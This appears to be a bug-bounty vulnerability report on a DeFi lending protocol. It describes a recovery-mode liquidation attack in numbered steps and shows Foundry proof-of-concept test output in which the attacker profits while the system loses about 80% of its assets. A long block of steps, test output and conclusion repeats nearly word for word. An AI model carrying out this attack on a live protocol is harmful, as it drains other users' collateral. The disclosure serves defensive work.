Direct theft of 2 stETH worth of any user funds, whether at-rest or in-motion, other than unclaimed yield
Liquidation Abuse: More than half of all assets can be liquidated in recovery mode.
At the end of the grace period in recovery mode, the liquidator can maximize profits and cause enormous losses to the protocol.
Vulnerability Details
The vulnerability is that in recovery mode, the liquidator can arbitrarily liquidate ICRs equal to or smaller than TCR.
When CDP with ICR smaller than TCR is liquidated, TCR rises.
In addition, TCR does not change when CDP with ICR such as TCR is completely liquidated.
In other words, the CDP with ICR close to TCR is liquidated, the slower the TCR rises, and if the system's recovery speed is very slow, the liquidated assets are eventually maximized.
Conversely, the smaller ICR is than TCR, the faster the system can enter the recovery phase, and the amount of liquidation is minimized.
These maximization and minimization principles have a significant impact on the amount of total assets held at the same time as the system transitions to normal mode, and the wave of total assets determines the system's stability (intensity) for future market fluctuations.
The distribution of collateral amount according to ICR is similar to one normal distribution chart in which the amount decreases as the distance to TCR is centered on the TCR. Of course, the real graph will draw a curve in which the right and left are not symmetrical to each other around TCR and the right is slower than the left. What is important is that assets are concentrated and distributed around TCRs.
This means that the maximization of liquidation leads to the rapid liquidation of the system's main assets, and in the worst-case scenario, more than half of the total collateral can be eliminated in a tx.
In particular, when TCR reaches MCR, this maximization reaches its peak, and the attacker can liquidate all CDPs between MCR and CCR. In the end, liquidation in recovery mode will deal a significant blow to the protocol and later bring about protocol bankruptcy, contrary to the initial purpose of maintaining the normal operation of the system by allowing liquidation in recovery mode to be allowed to recover quickly and improve the market situation.
Additionally, attempts to maximize liquidation lead to liquidation from a higher ICR to a lower one. This goes against the general principle that CDPs with higher ICRs should be relatively safer than CDPs with lower ICRs, which leads to the destruction of community.
Scenario for Liquidation Maximization Attack
Now the system is in recoveryMode and grace period is finished.
The attacker searches CDPs (ICR = TCR).
The attacker liquidates the CDPs (ICR = TCR). => oldTCR = newTCR.
The attacker searches the largest CDP (ICR < TCR)
The attacker searches the smallest CDP (TCR < ICR < CCR). And then the attacker calculates the debtAmount to make TCR to ICR of the found CDP.
The attacker liquidates the largest CDP (ICR < TCR) partially or fully until TCR reaches the desired ICR value.
If the liquidation of one CDP does not produce the desired TCR value, continue with the step 5.
Steps 1 through 6 are repeated until there is no CDP with an ICR greater than the TCR and less than the MCR.
Proceed to step 1 ~ step 6 until TCR reaches CCR - 1. Repeated steps 1, 2, 3, and 4 are due to the fact that partial liquidation of the CDP results in changes in ICR, so that the CDP may be larger than TCR and smaller than CCR.
Completely liquidate the CDP, which has the largest collateral amount among CDPs with ICRs smaller than TCRs.
As a result of this attack, all CDPs between the initial TCR and CCR are liquidated, and some CDPs with ICRs smaller than TCR are also completely and partially liquidated.
Let's look at this scenario through real code.
You can create PoC_CdpManagerLiquidationRecoveryTest.t.sol file in foundry_test folder.
And run this in terminal.
forge test -vvv --match-contract PoC_CdpManagerLiquidationRecoveryTest.
[PASS] test_PoC1LiquidationWithMinimalAmountInRecoveryMode() (gas: 436732)
block.timestamp 1
========= Configration ==========
------- Update Price -------
CDP_110ICR = 1100000000000000000
CDP_122ICR = 1220000000000000002
CDP_123ICR = 1230000000000000000
CDP_124ICR = 1240000000000000000
CDP_133ICR = 1330000000000000000
TCR: 1219481713292820526
--- wait until RMCollDown ---
Is available to liquidate? true
- Liquidate CDP_110ICR fully
TCR: 1253520994210266527
!!!System is in NormalMode liquidating only the first CDP!!!
Is CDP_110ICR liquidated? true
Is CDP_122ICR liquidated? false
Is CDP_123ICR liquidated? false
Is CDP_124ICR liquidated? false
Is CDP_133ICR liquidated? false
CDP size: 4
Final user revenue(stETH in wei): 1109090909090909091
[PASS] test_PoC2LiquidationAttackInRecoveryMode() (gas: 1169013)
block.timestamp 1
========= Configration ==========
------- Update Price -------
CDP_110ICR = 1100000000000000000
CDP_122ICR = 1220000000000000002
CDP_123ICR = 1230000000000000000
CDP_124ICR = 1240000000000000000
CDP_133ICR = 1330000000000000000
TCR: 1219481713292820526
--- wait until RMCollDown ---
--- Attacker will liquidate all CDPs (TCR <= ICR < CCR) and some CDPs (ICR < TCR < CCR) ---
---------------------------- Start Attack ----------------------------
Is available to liquidate CDP_122ICR? false
Is available to liquidate CDP_110ICR? true
- Liquidate CDP_110ICR partially: TCR -> 122%
deltaDebt: 10961605937691929
TCR: 1220000000000000002
Is available to liquidate CDP_122ICR? true
- Liquidate CDP_122ICR fully
TCR after LiqCDP_122ICR: 1220000000000000002
- Liquidate CDP_110ICR partially: TCR -> 123%
deltaDebt: 155355752425506834
TCR: 1230000000000000000
Is available to liquidate CDP_123ICR? true
- Liquidate CDP_123ICR fully
TCR after LiqCDP_123ICR: 1229999999999999999
- Liquidate CDP_110ICR partially: TCR -> 124%
deltaDebt: 97215499756125516
TCR: 1240000000000000000
Is available to liquidate CDP_124ICR? true
- Liquidate CDP_124ICR fully
TCR after LiqCDP_124ICR: 1239999999999999999
There is no CDP (TCR <= ICR < CCR)
-- Now the attacker will liquidate some CDPs (ICR <= TCR) < CCR to earn more money --
CDP_110ICR = 1100000000000000001
- Liquidate CDP_110ICR fully
TCR after LiqCDP_110ICR fully: 1330000000000000000
!!!System is in NormalMode liquidating 4 CDPs including the first CDP!!!
Is CDP_110ICR liquidated? true
Is CDP_122ICR liquidated? true
Is CDP_123ICR liquidated? true
Is CDP_124ICR liquidated? true
Is CDP_133ICR liquidated? false
CDP size: 1
Final user revenue(stETH in wei): 4148222783222976688
Test result: ok. 2 passed; 0 failed; 0 skipped; finished in 25.64ms
As can be seen from the code execution results, with the liquidation of the first CDP, we can return the system to normal mode and keep the system's holdings as much as possible.
However, the attacker liquidated all four CDPs in a maximization manner and made a quadruple profit, resulting in System losing 80% of its original assets.
Of course, the attacker will have to pay a small fee in the process of obtaining and repay again for debtToken because he uses a pool of several protocols such as balancer FlashLoan and uniswap dex to borrow debtToken, but if he calculates it well, a considerable amount of collateral can be liquidated and he would get much revenue.
Attached is a graph for intuitive understanding. The collateral itself according to the actual ICR is close to a normal distribution, but not a complete normal distribution.
Impact Details
As you can see, the attacker can maximize his or her profits by liquidating a significant number of CDPs through a maximization method rather than a minimization method. As a result, the protocol's holdings will be seriously affected, and more than half of the total holdings may be liquidated in the worst-case scenario, despite the fact that it can go to normal mode while minimizing the reduction of the protocol's holdings. This vicious cycle can deplete the protocol's assets, leading to the protocol's bankruptcy.
To solve this vulnerability, we can simply check the TCR whenever the function proceeds with a CDP.
Now the system is in recoveryMode and grace period is finished.
The attacker searches CDPs (ICR = TCR).
The attacker liquidates the CDPs (ICR = TCR). => oldTCR = newTCR.
The attacker searches the largest CDP (ICR < TCR)
The attacker searches the smallest CDP (TCR < ICR < CCR). And then the attacker calculates the debtAmount to make TCR to ICR of the found CDP.
The attacker liquidates the largest CDP (ICR < TCR) partially or fully until TCR reaches the desired ICR value.
If the liquidation of one CDP does not produce the desired TCR value, continue with the step 5.
Steps 1 through 6 are repeated until there is no CDP with an ICR greater than the TCR and less than the MCR.
Proceed to step 1 ~ step 6 until TCR reaches CCR - 1. Repeated steps 1, 2, 3, and 4 are due to the fact that partial liquidation of the CDP results in changes in ICR, so that the CDP may be larger than TCR and smaller than CCR.
Completely liquidate the CDP, which has the largest collateral amount among CDPs with ICRs smaller than TCRs.
As a result of this attack, all CDPs between the initial TCR and CCR are liquidated, and some CDPs with ICRs smaller than TCR are also completely and partially liquidated.
Let's look at this scenario through real code.
You can create PoC_CdpManagerLiquidationRecoveryTest.t.sol file in foundry_test folder.
And run this in terminal.
forge test -vvv --match-contract PoC_CdpManagerLiquidationRecoveryTest.
[PASS] test_PoC1LiquidationWithMinimalAmountInRecoveryMode() (gas: 436732)
block.timestamp 1
========= Configration ==========
------- Update Price -------
CDP_110ICR = 1100000000000000000
CDP_122ICR = 1220000000000000002
CDP_123ICR = 1230000000000000000
CDP_124ICR = 1240000000000000000
CDP_133ICR = 1330000000000000000
TCR: 1219481713292820526
--- wait until RMCollDown ---
Is available to liquidate? true
- Liquidate CDP_110ICR fully
TCR: 1253520994210266527
!!!System is in NormalMode liquidating only the first CDP!!!
Is CDP_110ICR liquidated? true
Is CDP_122ICR liquidated? false
Is CDP_123ICR liquidated? false
Is CDP_124ICR liquidated? false
Is CDP_133ICR liquidated? false
CDP size: 4
Final user revenue(stETH in wei): 1109090909090909091
[PASS] test_PoC2LiquidationAttackInRecoveryMode() (gas: 1169013)
block.timestamp 1
========= Configration ==========
------- Update Price -------
CDP_110ICR = 1100000000000000000
CDP_122ICR = 1220000000000000002
CDP_123ICR = 1230000000000000000
CDP_124ICR = 1240000000000000000
CDP_133ICR = 1330000000000000000
TCR: 1219481713292820526
--- wait until RMCollDown ---
--- Attacker will liquidate all CDPs (TCR <= ICR < CCR) and some CDPs (ICR < TCR < CCR) ---
---------------------------- Start Attack ----------------------------
Is available to liquidate CDP_122ICR? false
Is available to liquidate CDP_110ICR? true
- Liquidate CDP_110ICR partially: TCR -> 122%
deltaDebt: 10961605937691929
TCR: 1220000000000000002
Is available to liquidate CDP_122ICR? true
- Liquidate CDP_122ICR fully
TCR after LiqCDP_122ICR: 1220000000000000002
- Liquidate CDP_110ICR partially: TCR -> 123%
deltaDebt: 155355752425506834
TCR: 1230000000000000000
Is available to liquidate CDP_123ICR? true
- Liquidate CDP_123ICR fully
TCR after LiqCDP_123ICR: 1229999999999999999
- Liquidate CDP_110ICR partially: TCR -> 124%
deltaDebt: 97215499756125516
TCR: 1240000000000000000
Is available to liquidate CDP_124ICR? true
- Liquidate CDP_124ICR fully
TCR after LiqCDP_124ICR: 1239999999999999999
There is no CDP (TCR <= ICR < CCR)
-- Now the attacker will liquidate some CDPs (ICR <= TCR) < CCR to earn more money --
CDP_110ICR = 1100000000000000001
- Liquidate CDP_110ICR fully
TCR after LiqCDP_110ICR fully: 1330000000000000000
!!!System is in NormalMode liquidating 4 CDPs including the first CDP!!!
Is CDP_110ICR liquidated? true
Is CDP_122ICR liquidated? true
Is CDP_123ICR liquidated? true
Is CDP_124ICR liquidated? true
Is CDP_133ICR liquidated? false
CDP size: 1
Final user revenue(stETH in wei): 4148222783222976688
Test result: ok. 2 passed; 0 failed; 0 skipped; finished in 25.64ms
As can be seen from the code execution results, with the liquidation of the first CDP, we can return the system to normal mode and keep the system's holdings as much as possible.
However, the attacker liquidated all four CDPs in a maximization manner and made a quadruple profit, resulting in System losing 80% of its original assets.
Of course, the attacker will have to pay a small fee in the process of obtaining and repay again for debtToken because he uses a pool of several protocols such as balancer FlashLoan and uniswap dex to borrow debtToken, but if he calculates it well, a considerable amount of collateral can be liquidated and he would get much revenue.
Attached is a graph for intuitive understanding. The collateral itself according to the actual ICR is close to a normal distribution, but not a complete normal distribution.